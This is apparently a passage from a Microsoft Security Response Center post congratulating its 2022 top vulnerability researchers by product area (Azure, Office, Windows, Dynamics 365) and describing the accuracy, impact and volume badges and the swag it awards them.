In addition to our top 100 leaderboard, our annual technology area-specific leaderboards recognize researchers who have submitted high-impact vulnerabilities in particular product areas.

Congratulations to the top Azure researchers this year: **William Söderberg, Terry Zhang @pnig0s, and wtm**!

Congratulations to the top Office researchers this year: **ramzes, Hector Peralta (p3rr0), and Anonymous**!

Congratulations to the top Windows researchers this year: **Yuki Chen, k0shl, and rezer0dai**!

And new for our annual recognition, congratulations to the top Dynamics 365 researchers this year: **Mohammad Deilamy (MDM), Erik Donker, and Fabian Schmidt**!

In addition to MVR status, researchers are awarded badges to represent the following achievements:

 Accuracy – recognizes researchers with 100% accuracy, meaning all of their submissions were valid vulnerability reports

 Impact – recognizes high impact work, with the average points per valid vulnerability report at or above the 90th percentile

 Volume – recognizes a larger body of work, requiring at least five valid vulnerability reports

But wait…there’s more! Our 2022 MVRs will receive an MSRC swag box and digital badges to share their accomplishments on social media and professional portfolios. Researchers will be receiving an email from msrcmvr@microsoft.com in the coming month to claim their swag and badges.

Congratulations to each of the researchers recognized and thank you for continuing to partner with us to secure customers. We’re excited to see what you do in the next year!

_Lynn Miyashita, MSRC_

Search

lenovo warranty check/lookup | check warranty status | lenovo support us